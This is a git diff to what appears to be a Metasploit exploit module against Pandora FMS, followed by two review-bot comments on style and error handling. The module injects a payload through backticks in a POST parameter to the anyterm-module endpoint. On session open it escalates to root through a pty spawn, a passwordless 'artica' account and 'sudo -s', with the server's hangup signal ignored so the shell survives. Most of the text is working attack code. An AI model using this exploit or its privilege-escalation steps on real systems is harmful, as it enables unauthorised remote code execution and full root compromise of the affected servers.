diff --git a/modules/exploits/linux/http/pandora_fms_exec.rb b/modules/exploits/linux/http/pandora_fms_exec.rb
index d24d4bef50..66c7567798 100644
--- a/modules/exploits/linux/http/pandora_fms_exec.rb
+++ b/modules/exploits/linux/http/pandora_fms_exec.rb
@@ -59,16 +59,22 @@ class Metasploit3 < Msf::Exploit::Remote
 def on_new_session(client)
 print_status("#{peer} - Trying to escalate privileges to root")
- # Spawn a pty for su/sudo
- client.shell_command_token("python -c 'import pty;pty.spawn(\"/bin/sh\")'")
- # Su to the passwordless "artica" account
- client.shell_command_token("su - artica")
- # The "artica" use has sudo rights without the need for a password, thus gain root priveleges
- client.shell_command_token("sudo -s")
- end
+ [
+ # ignore SIGHUP so the server doesn't kill our root shell
+ "trap '' HUP",
+ # Spawn a pty for su/sudo
+ "python -c 'import pty;pty.spawn(\"/bin/sh\")'",
+ # Su to the passwordless "artica" account
+ "su - artica",
+ # The "artica" use has sudo rights without the need for a
+ # password, thus gain root priveleges
+ "sudo -s",
+ ].each do |command|
+ vprint_status(command)
+ client.shell_write(command + "\n")
+ end
- def peer
- return "#{rhost}:#{rport}"
+ super
 end
 def check
@@ -80,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'uri' => normalize_uri(target_uri.path, "anyterm.html")
 })
- if res and res.code == 200 and res.body =~ /Pandora FMS Remote Gateway/
+ if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway")
 print_good("#{peer} - Pandora FMS Remote Gateway Detected!")
 return Exploit::CheckCode::Detected
 end
@@ -95,14 +101,13 @@ class Metasploit3 < Msf::Exploit::Remote
 'uri' => normalize_uri(target_uri.path, "/anyterm-module"),
 'vars_post' => {
 'a' => "open",
- 'p' => "`nohup #{payload.encoded}`"
+ 'p' => "`#{payload.encoded}`"
 }
 })
- if not res or res.code != 200
+ if !res || res.code != 200
 fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
 end
-
 end
 end
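Review bot: The comments added to the command list in on_new_session carry over two typos from the removed lines ("use", "priveleges"), and they are the only place the module explains the weakness this step relies on. I would write them as `# The "artica" user has passwordless sudo rights,` and `# so "sudo -s" yields root privileges`. One more comment should state that the passwordless account and its sudo rule (presumably a NOPASSWD sudoers entry, not visible here) are what an administrator of the appliance has to remove. Separately, `vprint_status(command)` drops the `#{peer} - ` prefix that the other messages in this diff use; `vprint_status("#{peer} - #{command}")` keeps the output consistent. The class body starts outside the hunk.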
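Review bot: The rewritten guard `if !res || res.code != 200` still reports a missing response and a non-200 reply with the same `Failure::Unknown` and the same "Unexpected response" text, so a timeout cannot be told apart from a server that answered with an error. Splitting the guard keeps the reported reason accurate: `fail_with(Failure::Unreachable, "#{peer} - No response from the server") unless res` followed by `fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP #{res.code}") if res.code != 200`. The method this guard belongs to starts above the hunk.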